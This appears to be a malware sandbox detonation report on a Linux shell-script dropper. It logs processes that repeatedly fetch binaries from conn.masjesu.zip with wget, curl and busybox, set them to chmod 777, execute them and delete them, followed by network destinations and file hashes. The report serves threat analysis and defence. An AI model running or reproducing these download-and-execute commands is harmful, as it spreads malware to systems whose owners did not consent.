/tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz

[./teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]

/bin/rm

[rm teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]

/bin/chmod

[chmod 777 PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]

/tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx

[./PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]

/bin/rm

[rm PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]

/bin/chmod

[chmod 777 ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]

/tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m

[./ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]

/bin/rm

[rm ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]

/bin/chmod

[chmod 777 2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]

/tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS

[./2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]

/bin/rm

[rm 2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]

/bin/chmod

[chmod 777 zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]

/tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh

[./zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]

/bin/rm

[rm zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]

/bin/chmod

[chmod 777 mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]

/tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1

[./mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]

/bin/rm

[rm mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/bin/chmod

[chmod 777 WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG

[./WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/bin/rm

[rm WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]

/bin/chmod

[chmod 777 FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]

/tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx

[./FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]

/bin/rm

[rm FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]

/bin/chmod

[chmod 777 JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]

/tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx

[./JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]

/bin/rm

[rm JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]

/bin/chmod

[chmod 777 BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]

/tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa

[./BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]

/bin/rm

[rm BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]

/bin/chmod

[chmod 777 tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]

/tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN

[./tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]

/bin/rm

[rm tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]

/bin/chmod

[chmod 777 idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]

/tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4

[./idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]

/bin/rm

[rm idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]

/bin/chmod

[chmod 777 4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]

/tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8

[./4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]

/bin/rm

[rm 4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT]

/bin/chmod

[chmod 777 DQul2qKd09ITKkHJpETty8DirCA07F1nBT]

/tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT

[./DQul2qKd09ITKkHJpETty8DirCA07F1nBT]

/bin/rm

[rm DQul2qKd09ITKkHJpETty8DirCA07F1nBT]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]

/bin/chmod

[chmod 777 zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]

/tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh

[./zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]

/bin/rm

[rm zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]

/bin/chmod

[chmod 777 teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]

/tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz

[./teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]

/bin/rm

[rm teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]

/bin/chmod

[chmod 777 PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]

/tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx

[./PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]

/bin/rm

[rm PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]

/bin/chmod

[chmod 777 ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]

/tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m

[./ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]

/bin/rm

[rm ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]

/bin/chmod

[chmod 777 2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]

/tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS

[./2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]

/bin/rm

[rm 2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
BG 87.120.125.191:80 conn.masjesu.zip tcp

Files

/tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-20 03:24

Reported

2024-11-20 03:26

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

149s

Max time network

131s

Command Line

[/tmp/cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh]

Signatures

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh

[/tmp/cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 151.101.129.91:443 tcp
GB 89.187.167.3:443 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.62:443 tcp

Files

N/A